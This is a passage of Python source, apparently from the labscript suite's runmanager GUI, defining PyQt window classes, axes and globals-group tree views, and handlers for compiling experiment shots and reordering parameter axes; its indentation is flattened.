item = self.globals_model.item(row, self.GLOBALS_COL_VALUE)
if item.data(self.GLOBALS_ROLE_IS_DUMMY_ROW):
continue
item.setData(None, QtCore.Qt.DecorationRole)
item.setToolTip('Group inactive')
item.setData(None, QtCore.Qt.BackgroundRole)
class RunmanagerMainWindow(QtWidgets.QMainWindow):
# A signal to show that the window is shown and painted.
firstPaint = Signal()
# A signal for when the window manager has created a new window for this widget:
newWindow = Signal(int)
def __init__(self, *args, **kwargs):
QtWidgets.QMainWindow.__init__(self, *args, **kwargs)
self._previously_painted = False
def closeEvent(self, event):
if app.on_close_event():
return QtWidgets.QMainWindow.closeEvent(self, event)
else:
event.ignore()
def event(self, event):
result = QtWidgets.QMainWindow.event(self, event)
if event.type() == QtCore.QEvent.WinIdChange:
self.newWindow.emit(self.effectiveWinId())
return result
def paintEvent(self, event):
result = QtWidgets.QMainWindow.paintEvent(self, event)
if not self._previously_painted:
self._previously_painted = True
self.firstPaint.emit()
return result
class PoppedOutOutputBoxWindow(QtWidgets.QDialog):
# A signal for when the window manager has created a new window for this widget:
newWindow = Signal(int)
def closeEvent(self, event):
app.on_output_popout_button_clicked()
def event(self, event):
result = QtWidgets.QDialog.event(self, event)
if event.type() == QtCore.QEvent.WinIdChange:
self.newWindow.emit(self.effectiveWinId())
return result
class RunManager(object):
# Constants for the model in the axes tab:
AXES_COL_NAME = 0
AXES_COL_LENGTH = 1
AXES_COL_SHUFFLE = 2
AXES_ROLE_NAME = QtCore.Qt.UserRole + 1
# Constants for the model in the groups tab:
GROUPS_COL_NAME = 0
GROUPS_COL_ACTIVE = 1
GROUPS_COL_DELETE = 2
GROUPS_COL_OPENCLOSE = 3
GROUPS_ROLE_IS_DUMMY_ROW = QtCore.Qt.UserRole + 1
GROUPS_ROLE_PREVIOUS_NAME = QtCore.Qt.UserRole + 2
GROUPS_ROLE_SORT_DATA = QtCore.Qt.UserRole + 3
GROUPS_ROLE_GROUP_IS_OPEN = QtCore.Qt.UserRole + 4
GROUPS_DUMMY_ROW_TEXT = '<Click to add group>'
def __init__(self):
loader = UiLoader()
loader.registerCustomWidget(FingerTabWidget)
loader.registerCustomWidget(TreeView)
self.ui = loader.load('main.ui', RunmanagerMainWindow())
self.output_box = OutputBox(self.ui.verticalLayout_output_tab)
# Add a 'pop-out' button to the output tab:
output_tab_index = self.ui.tabWidget.indexOf(self.ui.tab_output)
self.output_popout_button = TabToolButton(self.ui.tabWidget.parent())
self.output_popout_button.setIcon(QtGui.QIcon(':/qtutils/fugue/arrow-out'))
self.output_popout_button.setToolTip('Toggle whether the output box is in a separate window')
self.ui.tabWidget.tabBar().setTabButton(output_tab_index, QtWidgets.QTabBar.RightSide, self.output_popout_button)
# Fix the first three tabs in place:
for index in range(3):
self.ui.tabWidget.tabBar().setMovable(False, index=index)
# Whether or not the output box is currently popped out:
self.output_box_is_popped_out = False
# The window it will be moved to when popped out:
self.output_box_window = PoppedOutOutputBoxWindow(self.ui, QtCore.Qt.WindowSystemMenuHint)
self.output_box_window_verticalLayout = QtWidgets.QVBoxLayout(self.output_box_window)
self.output_box_window_verticalLayout.setContentsMargins(0, 0, 0, 0)
self.output_box_window.setWindowTitle('runmanager output')
self.output_box_window.resize(800, 1000)
self.setup_config()
self.setup_axes_tab()
self.setup_groups_tab()
self.connect_signals()
# The last location from which a labscript file was selected, defaults
# to labscriptlib:
self.last_opened_labscript_folder = self.exp_config.get('paths', 'labscriptlib')
# The last location from which a globals file was selected, defaults
# to experiment_shot_storage:
self.last_opened_globals_folder = self.exp_config.get('paths', 'experiment_shot_storage')
# The last file to which the user saved or loaded a configuration:
self.last_save_config_file = None
# The last manually selected shot output folder, defaults to
# experiment_shot_storage:
self.last_selected_shot_output_folder = self.exp_config.get('paths', 'experiment_shot_storage')
self.shared_drive_prefix = self.exp_config.get('paths', 'shared_drive')
self.experiment_shot_storage = self.exp_config.get('paths', 'experiment_shot_storage')
# What the automatically created output folders should be, as an
# argument to time.strftime():
try:
self.output_folder_format = self.exp_config.get('runmanager', 'output_folder_format')
# Better not start with slashes, irrelevant if it ends with them:
self.output_folder_format = self.output_folder_format.strip(os.path.sep)
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
self.output_folder_format = os.path.join('%Y', '%m', '%d')
# Store the currently open groups as {(globals_filename, group_name): GroupTab}
self.currently_open_groups = {}
# A thread that will evaluate globals when they change, allowing us to
# show their values and any errors in the tabs they came from.
self.preparse_globals_thread = threading.Thread(target=self.preparse_globals_loop)
self.preparse_globals_thread.daemon = True
# A threading.Event to inform the preparser thread when globals have
# changed, and thus need parsing again:
self.preparse_globals_required = threading.Event()
self.preparse_globals_thread.start()
# A flag telling the compilation thread to abort:
self.compilation_aborted = threading.Event()
# A few attributes for self.guess_expansion_modes() to keep track of
# its state, and thus detect changes:
self.previous_evaled_globals = {}
self.previous_global_hierarchy = {}
self.previous_expansion_types = {}
self.previous_expansions = {}
# Start the loop that allows compilations to be queued up:
self.compile_queue = Queue.Queue()
self.compile_queue_thread = threading.Thread(target=self.compile_loop)
self.compile_queue_thread.daemon = True
self.compile_queue_thread.start()
# Start the compiler subprocess:
self.to_child, self.from_child, self.child = zprocess.subprocess_with_queues(
'batch_compiler.py', self.output_box.port)
# Start a thread to monitor the time of day and create new shot output
# folders for each day:
self.output_folder_update_required = threading.Event()
inthread(self.rollover_shot_output_folder)
# The data from the last time we saved the configuration, so we can
# know if something's changed:
self.last_save_data = None
# autoload a config file, if labconfig is set to do so:
try:
autoload_config_file = self.exp_config.get('runmanager', 'autoload_config_file')
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
self.output_box.output('Ready.\n\n')
else:
self.ui.setEnabled(False)
self.output_box.output('Loading default config file %s...' % autoload_config_file)
def load_the_config_file():
try:
self.load_configuration(autoload_config_file)
self.output_box.output('done.\n')
except Exception as e:
self.output_box.output('\nCould not load config file: %s: %s\n\n' %
(e.__class__.__name__, str(e)), red=True)
else:
self.output_box.output('Ready.\n\n')
finally:
self.ui.setEnabled(True)
# Defer this until 50ms after the window has shown,
# so that the GUI pops up faster in the meantime
self.ui.firstPaint.connect(lambda: QtCore.QTimer.singleShot(50, load_the_config_file))
self.ui.show()
def setup_config(self):
required_config_params = {"DEFAULT": ["experiment_name"],
"programs": ["text_editor",
"text_editor_arguments",
],
"ports": ['BLACS', 'runviewer'],
"paths": ["shared_drive",
"experiment_shot_storage",
"labscriptlib",
],
}
self.exp_config = LabConfig(required_params = required_config_params)
def setup_axes_tab(self):
self.axes_model = QtGui.QStandardItemModel()
# Setup the model columns and link to the treeview
name_header_item = QtGui.QStandardItem('Name')
name_header_item.setToolTip('The name of the global or zip group being iterated over')
self.axes_model.setHorizontalHeaderItem(self.AXES_COL_NAME, name_header_item)
length_header_item = QtGui.QStandardItem('Length')
length_header_item.setToolTip('The number of elements in the axis of the parameter space')
self.axes_model.setHorizontalHeaderItem(self.AXES_COL_LENGTH, length_header_item)
shuffle_header_item = QtGui.QStandardItem('Shuffle')
shuffle_header_item.setToolTip('Whether or not the order of the axis should be randomised')
shuffle_header_item.setIcon(QtGui.QIcon(':qtutils/fugue/arrow-switch'))
self.axes_model.setHorizontalHeaderItem(self.AXES_COL_SHUFFLE, shuffle_header_item)
self.ui.treeView_axes.setModel(self.axes_model)
# Setup stuff for a custom context menu:
self.ui.treeView_axes.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
# Make the actions for the context menu:
self.action_axes_check_selected = QtWidgets.QAction(QtGui.QIcon(':qtutils/fugue/ui-check-box'),
'Check selected', self.ui)
self.action_axes_uncheck_selected = QtWidgets.QAction(QtGui.QIcon(':qtutils/fugue/ui-check-box-uncheck'),
'Uncheck selected', self.ui)
# setup header widths
self.ui.treeView_axes.header().setStretchLastSection(False)
self.ui.treeView_axes.header().setSectionResizeMode(self.AXES_COL_NAME, QtWidgets.QHeaderView.Stretch)
def setup_groups_tab(self):
self.groups_model = QtGui.QStandardItemModel()
self.groups_model.setHorizontalHeaderLabels(['File/group name', 'Active', 'Delete', 'Open/Close'])
self.groups_model.setSortRole(self.GROUPS_ROLE_SORT_DATA)
self.item_delegate = ItemDelegate(self.ui.treeView_groups)
self.ui.treeView_groups.setModel(self.groups_model)
for col in range(self.groups_model.columnCount()):
self.ui.treeView_groups.setItemDelegateForColumn(col, self.item_delegate)
self.ui.treeView_groups.setAnimated(True) # Pretty
self.ui.treeView_groups.setSelectionMode(QtWidgets.QTreeView.ExtendedSelection)
self.ui.treeView_groups.setSortingEnabled(True)
self.ui.treeView_groups.sortByColumn(self.GROUPS_COL_NAME, QtCore.Qt.AscendingOrder)
# Set column widths:
self.ui.treeView_groups.setColumnWidth(self.GROUPS_COL_NAME, 400)
# Make it so the user can just start typing on an item to edit:
self.ui.treeView_groups.setEditTriggers(QtWidgets.QTreeView.AnyKeyPressed |
QtWidgets.QTreeView.EditKeyPressed |
QtWidgets.QTreeView.SelectedClicked)
# Ensure the clickable region of the open/close button doesn't extend forever:
self.ui.treeView_groups.header().setStretchLastSection(False)
# Shrink columns other than the 'name' column to the size of their headers:
for column in range(self.groups_model.columnCount()):
if column != self.GROUPS_COL_NAME:
self.ui.treeView_groups.resizeColumnToContents(column)
self.ui.treeView_groups.setTextElideMode(QtCore.Qt.ElideMiddle)
# Setup stuff for a custom context menu:
self.ui.treeView_groups.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
# Make the actions for the context menu:
self.action_groups_set_selection_active = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box'), 'Set selected group(s) active', self.ui)
self.action_groups_set_selection_inactive = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box-uncheck'), 'Set selected group(s) inactive', self.ui)
self.action_groups_delete_selected = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/minus'), 'Delete selected group(s)', self.ui)
self.action_groups_open_selected = QtWidgets.QAction(
QtGui.QIcon(':/qtutils/fugue/plus'), 'Open selected group(s)', self.ui)
self.action_groups_close_selected_groups = QtWidgets.QAction(
QtGui.QIcon(':/qtutils/fugue/cross'), 'Close selected group(s)', self.ui)
self.action_groups_close_selected_files = QtWidgets.QAction(
QtGui.QIcon(':/qtutils/fugue/cross'), 'Close selected file(s)', self.ui)
# A counter for keeping track of the recursion depth of
# self._groups_model_active_changed(). This is used so that some
# actions can be taken in response to initial data changes, but not to
# flow-on changes made by the method itself:
self.on_groups_model_active_changed_recursion_depth = 0
def connect_signals(self):
# The button that pops the output box in and out:
self.output_popout_button.clicked.connect(self.on_output_popout_button_clicked)
# The menu items:
self.ui.actionLoad_configuration.triggered.connect(self.on_load_configuration_triggered)
self.ui.actionRevert_configuration.triggered.connect(self.on_revert_configuration_triggered)
self.ui.actionSave_configuration.triggered.connect(self.on_save_configuration_triggered)
self.ui.actionSave_configuration_as.triggered.connect(self.on_save_configuration_as_triggered)
self.ui.actionQuit.triggered.connect(self.ui.close)
# labscript file and folder selection stuff:
self.ui.toolButton_select_labscript_file.clicked.connect(self.on_select_labscript_file_clicked)
self.ui.toolButton_select_shot_output_folder.clicked.connect(self.on_select_shot_output_folder_clicked)
self.ui.toolButton_edit_labscript_file.clicked.connect(self.on_edit_labscript_file_clicked)
self.ui.toolButton_reset_shot_output_folder.clicked.connect(self.on_reset_shot_output_folder_clicked)
self.ui.lineEdit_labscript_file.textChanged.connect(self.on_labscript_file_text_changed)
self.ui.lineEdit_shot_output_folder.textChanged.connect(self.on_shot_output_folder_text_changed)
# Control buttons; engage, abort, restart subprocess:
self.ui.pushButton_engage.clicked.connect(self.on_engage_clicked)
self.ui.pushButton_abort.clicked.connect(self.on_abort_clicked)
self.ui.pushButton_restart_subprocess.clicked.connect(self.on_restart_subprocess_clicked)
# shuffle master control
self.ui.pushButton_shuffle.stateChanged.connect(self.on_master_shuffle_clicked)
# Tab closebutton clicked:
self.ui.tabWidget.tabCloseRequested.connect(self.on_tabCloseRequested)
# Axes tab; right click menu, menu actions, reordering
# self.ui.treeView_axes.customContextMenuRequested.connect(self.on_treeView_axes_context_menu_requested)
self.action_axes_check_selected.triggered.connect(self.on_axes_check_selected_triggered)
self.action_axes_uncheck_selected.triggered.connect(self.on_axes_uncheck_selected_triggered)
self.ui.toolButton_axis_to_top.clicked.connect(self.on_axis_to_top_clicked)
self.ui.toolButton_axis_up.clicked.connect(self.on_axis_up_clicked)
self.ui.toolButton_axis_down.clicked.connect(self.on_axis_down_clicked)
self.ui.toolButton_axis_to_bottom.clicked.connect(self.on_axis_to_bottom_clicked)
# axes tab item changed handler
self.axes_model.itemChanged.connect(self.on_axes_item_changed)
self.axes_model.rowsRemoved.connect(self.update_global_shuffle_state)
self.axes_model.rowsInserted.connect(self.update_global_shuffle_state)
# Groups tab; right click menu, menu actions, open globals file, new globals file, diff globals file,
self.ui.treeView_groups.customContextMenuRequested.connect(self.on_treeView_groups_context_menu_requested)
self.action_groups_set_selection_active.triggered.connect(
lambda: self.on_groups_set_selection_active_triggered(QtCore.Qt.Checked))
self.action_groups_set_selection_inactive.triggered.connect(
lambda: self.on_groups_set_selection_active_triggered(QtCore.Qt.Unchecked))
self.action_groups_delete_selected.triggered.connect(self.on_groups_delete_selected_triggered)
self.action_groups_open_selected.triggered.connect(self.on_groups_open_selected_triggered)
self.action_groups_close_selected_groups.triggered.connect(self.on_groups_close_selected_groups_triggered)
self.action_groups_close_selected_files.triggered.connect(self.on_groups_close_selected_files_triggered)
self.ui.pushButton_open_globals_file.clicked.connect(self.on_open_globals_file_clicked)
self.ui.pushButton_new_globals_file.clicked.connect(self.on_new_globals_file_clicked)
self.ui.pushButton_diff_globals_file.clicked.connect(self.on_diff_globals_file_clicked)
self.ui.treeView_groups.leftClicked.connect(self.on_treeView_groups_leftClicked)
self.ui.treeView_groups.doubleLeftClicked.connect(self.on_treeView_groups_doubleLeftClicked)
self.groups_model.itemChanged.connect(self.on_groups_model_item_changed)
# A context manager with which we can temporarily disconnect the above connection.
self.groups_model_item_changed_disconnected = DisconnectContextManager(
self.groups_model.itemChanged, self.on_groups_model_item_changed)
# Tell Windows how to handle our windows in the the taskbar, making pinning work properly and stuff:
if os.name == 'nt':
self.ui.newWindow.connect(set_win_appusermodel)
self.output_box_window.newWindow.connect(set_win_appusermodel)
def on_close_event(self):
save_data = self.get_save_data()
if self.last_save_data is not None and save_data != self.last_save_data:
message = ('Current configuration (which groups are active/open and other GUI state) '
'has changed: save config file \'%s\'?' % self.last_save_config_file)
reply = QtWidgets.QMessageBox.question(self.ui, 'Quit runmanager', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No | QtWidgets.QMessageBox.Cancel)
if reply == QtWidgets.QMessageBox.Cancel:
return False
if reply == QtWidgets.QMessageBox.Yes:
self.save_configuration(self.last_save_config_file)
self.to_child.put(['quit', None])
return True
def on_keyPress(self, key, modifiers, is_autorepeat):
if key == QtCore.Qt.Key_F5 and modifiers == QtCore.Qt.NoModifier and not is_autorepeat:
self.ui.pushButton_engage.setDown(True)
elif key == QtCore.Qt.Key_W and modifiers == QtCore.Qt.ControlModifier and not is_autorepeat:
current_tab_widget = self.ui.tabWidget.currentWidget()
for (globals_file, group_name), tab in self.currently_open_groups.items():
if tab.ui is current_tab_widget:
self.close_group(globals_file, group_name)
elif modifiers & QtCore.Qt.ControlModifier:
if key == QtCore.Qt.Key_Tab:
change = 1
elif key == QtCore.Qt.Key_Backtab:
change = -1
else:
return
current_index = self.ui.tabWidget.currentIndex()
n_tabs = self.ui.tabWidget.count()
new_index = (current_index + change) % n_tabs
self.ui.tabWidget.setCurrentIndex(new_index)
def on_keyRelease(self, key, modifiers, is_autorepeat):
if key == QtCore.Qt.Key_F5 and not is_autorepeat:
self.ui.pushButton_engage.setDown(False)
self.ui.pushButton_engage.clicked.emit(False)
def on_output_popout_button_clicked(self):
if self.output_box_is_popped_out:
self.ui.verticalLayout_output_tab.addWidget(self.output_box.output_textedit)
self.output_box_window.hide()
self.output_popout_button.setIcon(QtGui.QIcon(':/qtutils/fugue/arrow-out'))
else:
# pop it out
# self.ui.verticalLayout_output_tab.remove(self.output_box)
self.output_box_window_verticalLayout.addWidget(self.output_box.output_textedit)
self.output_popout_button.setIcon(QtGui.QIcon(':/qtutils/fugue/arrow-in'))
self.output_box_window.show()
self.output_box_is_popped_out = not self.output_box_is_popped_out
def on_select_labscript_file_clicked(self, checked):
labscript_file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
'Select labscript file',
self.last_opened_labscript_folder,
"Python files (*.py)")
if type(labscript_file) is tuple:
labscript_file, _ = labscript_file
if not labscript_file:
# User cancelled selection
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
labscript_file = os.path.abspath(labscript_file)
if not os.path.isfile(labscript_file):
error_dialog("No such file %s." % labscript_file)
return
# Save the containing folder for use next time we open the dialog box:
self.last_opened_labscript_folder = os.path.dirname(labscript_file)
# Write the file to the lineEdit:
self.ui.lineEdit_labscript_file.setText(labscript_file)
# Tell the output folder thread that the output folder might need updating:
self.output_folder_update_required.set()
def on_edit_labscript_file_clicked(self, checked):
# get path to text editor
editor_path = self.exp_config.get('programs', 'text_editor')
editor_args = self.exp_config.get('programs', 'text_editor_arguments')
# Get the current labscript file:
current_labscript_file = self.ui.lineEdit_labscript_file.text()
# Ignore if no file selected
if not current_labscript_file:
return
if not editor_path:
error_dialog("No editor specified in the labconfig.")
if '{file}' in editor_args:
# Split the args on spaces into a list, replacing {file} with the labscript file
editor_args = [arg if arg != '{file}' else current_labscript_file for arg in editor_args.split()]
else:
# Otherwise if {file} isn't already in there, append it to the other args:
editor_args = [current_labscript_file] + editor_args.split()
try:
subprocess.Popen([editor_path] + editor_args)
except Exception as e:
error_dialog("Unable to launch text editor specified in %s. Error was: %s" %
(self.exp_config.config_path, str(e)))
def on_select_shot_output_folder_clicked(self, checked):
shot_output_folder = QtWidgets.QFileDialog.getExistingDirectory(self.ui,
'Select shot output folder',
self.last_selected_shot_output_folder)
if type(shot_output_folder) is tuple:
shot_output_folder, _ = shot_output_folder
if not shot_output_folder:
# User cancelled selection
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
shot_output_folder = os.path.abspath(shot_output_folder)
# Save the containing folder for use next time we open the dialog box:
self.last_selected_shot_output_folder = os.path.dirname(shot_output_folder)
# Write the file to the lineEdit:
self.ui.lineEdit_shot_output_folder.setText(shot_output_folder)
# Tell the output folder rollover thread to run an iteration, so that
# it notices this change (even though it won't do anything now - this
# is so it can respond correctly if anything else interesting happens
# within the next second):
self.output_folder_update_required.set()
def on_reset_shot_output_folder_clicked(self, checked):
current_default_output_folder = self.get_default_output_folder()
if current_default_output_folder is None:
return
self.ui.lineEdit_shot_output_folder.setText(current_default_output_folder)
# Tell the output folder rollover thread to run an iteration, so that
# it notices this change (even though it won't do anything now - this
# is so it can respond correctly if anything else interesting happens
# within the next second):
self.output_folder_update_required.set()
def on_labscript_file_text_changed(self, text):
# Blank out the 'edit labscript file' button if no labscript file is
# selected
enabled = bool(text)
self.ui.toolButton_edit_labscript_file.setEnabled(enabled)
# Blank out the 'select shot output folder' button if no labscript
# file is selected:
self.ui.toolButton_select_shot_output_folder.setEnabled(enabled)
self.ui.lineEdit_labscript_file.setToolTip(text)
def on_shot_output_folder_text_changed(self, text):
# Blank out the 'reset default output folder' button if the user is
# already using the default output folder
if text == self.get_default_output_folder():
enabled = False
else:
enabled = True
self.ui.toolButton_reset_shot_output_folder.setEnabled(enabled)
self.ui.lineEdit_shot_output_folder.setToolTip(text)
def on_engage_clicked(self):
logger.info('Engage')
try:
send_to_BLACS = self.ui.checkBox_run_shots.isChecked()
send_to_runviewer = self.ui.checkBox_view_shots.isChecked()
labscript_file = self.ui.lineEdit_labscript_file.text()
# even though we shuffle on a per global basis, if ALL of the globals are set to shuffle, then we may as well shuffle again. This helps shuffle shots more randomly than just shuffling within each level (because without this, you would still do all shots with the outer most variable the same, etc)
shuffle = self.ui.pushButton_shuffle.checkState() == QtCore.Qt.Checked
if not labscript_file:
raise Exception('Error: No labscript file selected')
output_folder = self.ui.lineEdit_shot_output_folder.text()
if not output_folder:
raise Exception('Error: No output folder selected')
BLACS_host = self.ui.lineEdit_BLACS_hostname.text()
logger.info('Parsing globals...')
active_groups = self.get_active_groups()
# Get ordering of expansion globals
expansion_order = {}
for i in range(self.axes_model.rowCount()):
item = self.axes_model.item(i, self.AXES_COL_NAME)
shuffle_item = self.axes_model.item(i, self.AXES_COL_SHUFFLE)
name = item.data(self.AXES_ROLE_NAME)
expansion_order[name] = {'order':i, 'shuffle':shuffle_item.checkState()}
try:
sequenceglobals, shots, evaled_globals, global_hierarchy, expansions = self.parse_globals(active_groups, expansion_order=expansion_order)
except Exception as e:
raise Exception('Error parsing globals:\n%s\nCompilation aborted.' % str(e))
logger.info('Making h5 files')
labscript_file, run_files = self.make_h5_files(
labscript_file, output_folder, sequenceglobals, shots, shuffle)
self.ui.pushButton_abort.setEnabled(True)
self.compile_queue.put([labscript_file, run_files, send_to_BLACS, BLACS_host, send_to_runviewer])
except Exception as e:
self.output_box.output('%s\n\n' % str(e), red=True)
logger.info('end engage')
def on_abort_clicked(self):
self.compilation_aborted.set()
def on_restart_subprocess_clicked(self):
# Kill and restart the compilation subprocess
self.to_child.put(['quit', None])
self.from_child.put(['done', False])
time.sleep(0.1)
self.output_box.output('Asking subprocess to quit...')
timeout_time = time.time() + 2
QtCore.QTimer.singleShot(50, lambda: self.check_child_exited(timeout_time, kill=False))
def check_child_exited(self, timeout_time, kill=False):
self.child.poll()
if self.child.returncode is None and time.time() < timeout_time:
QtCore.QTimer.singleShot(50, lambda: self.check_child_exited(timeout_time, kill))
return
elif self.child.returncode is None:
if not kill:
self.child.terminate()
self.output_box.output('not responding.\n')
timeout_time = time.time() + 2
QtCore.QTimer.singleShot(50, lambda: self.check_child_exited(timeout_time, kill=True))
return
else:
self.child.kill()
self.output_box.output('Killed\n', red=True)
elif kill:
self.output_box.output('Terminated\n', red=True)
else:
self.output_box.output('done.\n')
self.output_box.output('Spawning new compiler subprocess...')
self.to_child, self.from_child, self.child = zprocess.subprocess_with_queues(
'batch_compiler.py', self.output_box.port)
self.output_box.output('done.\n')
self.output_box.output('Ready.\n\n')
def on_tabCloseRequested(self, index):
tab_page = self.ui.tabWidget.widget(index)
for (globals_file, group_name), group_tab in self.currently_open_groups.items():
if group_tab.ui is tab_page:
self.close_group(globals_file, group_name)
break
def on_treeView_axes_context_menu_requested(self, point):
raise NotImplementedError
# menu = QtWidgets.QMenu(self.ui)
# menu.addAction(self.action_axes_check_selected)
# menu.addAction(self.action_axes_uncheck_selected)
# menu.exec_(QtGui.QCursor.pos())
pass
def on_axes_check_selected_triggered(self, *args):
raise NotImplementedError
def on_axes_uncheck_selected_triggered(self, *args):
raise NotImplementedError
def on_axis_to_top_clicked(self, checked):
# Get the selection model from the treeview
selection_model = self.ui.treeView_axes.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row while it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now, be one row higher
# since we start moving elements of the list upwards starting from the lowest index)
while row > 0 and (row-1) not in selected_row_list:
# Remove the selected row
items = self.axes_model.takeRow(row)
# Add the selected row into a position one above
self.axes_model.insertRow(row-1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.axes_model.indexFromItem(items[0]),QtCore.QItemSelectionModel.SelectCurrent|QtCore.QItemSelectionModel.Rows)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
row -= 1
self.update_axes_indentation()
def on_axis_up_clicked(self, checked):
# Get the selection model from the treeview
selection_model = self.ui.treeView_axes.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row if it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now, be one row higher
# since we start moving elements of the list upwards starting from the lowest index)
if row > 0 and (row-1) not in selected_row_list:
# Remove the selected row
items = self.axes_model.takeRow(row)
# Add the selected row into a position one above
self.axes_model.insertRow(row-1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.axes_model.indexFromItem(items[0]),QtCore.QItemSelectionModel.SelectCurrent|QtCore.QItemSelectionModel.Rows)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
self.update_axes_indentation()
def on_axis_down_clicked(self, checked):
# Get the selection model from the treeview
selection_model = self.ui.treeView_axes.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row if it is not the last element, and the row above it is not selected
# (note that while a row below may have been initially selected, it should by now, be one row lower
# since we start moving elements of the list upwards starting from the highest index)
if row < self.axes_model.rowCount()-1 and (row+1) not in selected_row_list:
# Remove the selected row
items = self.axes_model.takeRow(row)
# Add the selected row into a position one above
self.axes_model.insertRow(row+1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.axes_model.indexFromItem(items[0]),QtCore.QItemSelectionModel.SelectCurrent|QtCore.QItemSelectionModel.Rows)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
self.update_axes_indentation()
def on_axis_to_bottom_clicked(self, checked):
selection_model = self.ui.treeView_axes.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row while it is not the last element, and the row above it is not selected
# (note that while a row below may have been initially selected, it should by now, be one row lower
# since we start moving elements of the list upwards starting from the highest index)
while row < self.axes_model.rowCount()-1 and (row+1) not in selected_row_list:
# Remove the selected row
items = self.axes_model.takeRow(row)
# Add the selected row into a position one above
self.axes_model.insertRow(row+1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.axes_model.indexFromItem(items[0]),QtCore.QItemSelectionModel.SelectCurrent|QtCore.QItemSelectionModel.Rows)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
row += 1
self.update_axes_indentation()
def on_axes_item_changed(self, item):
if item.column() == self.AXES_COL_SHUFFLE:
self.update_global_shuffle_state()
def update_global_shuffle_state(self, *args, **kwargs):
all_checked = True
none_checked = True
for i in range(self.axes_model.rowCount()):
check_state = self.axes_model.item(i, self.AXES_COL_SHUFFLE).checkState() == QtCore.Qt.Checked
all_checked = all_checked and check_state
none_checked = none_checked and not check_state
if not all_checked and not none_checked:
self.ui.pushButton_shuffle.setTristate(True)
self.ui.pushButton_shuffle.setCheckState(QtCore.Qt.PartiallyChecked)
elif none_checked:
self.ui.pushButton_shuffle.setTristate(False)
self.ui.pushButton_shuffle.setCheckState(QtCore.Qt.Unchecked)
else:
self.ui.pushButton_shuffle.setTristate(False)
self.ui.pushButton_shuffle.setCheckState(QtCore.Qt.Checked)
def on_master_shuffle_clicked(self, state):
if state in [QtCore.Qt.Checked, QtCore.Qt.Unchecked]:
self.ui.pushButton_shuffle.setTristate(False)
for i in range(self.axes_model.rowCount()):
item = self.axes_model.item(i, self.AXES_COL_SHUFFLE)
if item.checkState() != state:
self.axes_model.item(i, self.AXES_COL_SHUFFLE).setCheckState(state)
def on_treeView_groups_context_menu_requested(self, point):
menu = QtWidgets.QMenu(self.ui)
menu.addAction(self.action_groups_set_selection_active)
menu.addAction(self.action_groups_set_selection_inactive)
menu.addAction(self.action_groups_delete_selected)
menu.addAction(self.action_groups_open_selected)
menu.addAction(self.action_groups_close_selected_groups)
menu.addAction(self.action_groups_close_selected_files)
copy_menu = QtWidgets.QMenu('Copy selected group(s) to...', menu)
copy_menu.setIcon(QtGui.QIcon(':/qtutils/fugue/blue-document-copy'))
menu.addMenu(copy_menu)
move_menu = QtWidgets.QMenu('Move selected group(s) to...', menu)
move_menu.setIcon(QtGui.QIcon(':/qtutils/fugue/blue-document--arrow'))
menu.addMenu(move_menu)
# Create a dict of all filepaths -> filenames
filenames = {}
for index in range(self.groups_model.rowCount()):
filepath = self.groups_model.item(index, self.GROUPS_COL_NAME).text()
filenames[filepath] = filepath.split(os.sep)[-1]
# expand duplicate filenames until there is nomore duplicates
new_filename = {}
i = 2
while new_filename != filenames:
for filepath, filename in filenames.items():
if filenames.values().count(filename) > 1:
new_filename[filepath] = os.sep.join(filepath.split(os.sep)[-i:])
else:
new_filename[filepath] = filename
filenames = new_filename
i += 1
# add all filenames to the copy and move submenu
for filepath, filename in filenames.items():
copy_menu.addAction(filename, lambda filepath=filepath: self.on_groups_copy_selected_groups_triggered(filepath, False))
move_menu.addAction(filename, lambda filepath=filepath: self.on_groups_copy_selected_groups_triggered(filepath, True))
menu.exec_(QtGui.QCursor.pos())
def on_groups_copy_selected_groups_triggered(self, dest_globals_file=None, delete_source_group=False):
selected_indexes = self.ui.treeView_groups.selectedIndexes()
selected_items = (self.groups_model.itemFromIndex(index) for index in selected_indexes)
name_items = [item for item in selected_items
if item.column() == self.GROUPS_COL_NAME
and item.parent() is not None]
for item in name_items:
source_globals_file = item.parent().text()
self.copy_group(source_globals_file, item.text(), dest_globals_file, delete_source_group)
def on_groups_set_selection_active_triggered(self, checked_state):
selected_indexes = self.ui.treeView_groups.selectedIndexes()
# Filter to only include the 'active' column:
selected_items = (self.groups_model.itemFromIndex(index) for index in selected_indexes)
active_items = (item for item in selected_items
if item.column() == self.GROUPS_COL_ACTIVE
and item.parent() is not None)
for item in active_items:
item.setCheckState(checked_state)
def on_groups_delete_selected_triggered(self):
selected_indexes = self.ui.treeView_groups.selectedIndexes()
selected_items = (self.groups_model.itemFromIndex(index) for index in selected_indexes)
name_items = [item for item in selected_items
if item.column() == self.GROUPS_COL_NAME
and item.parent() is not None]
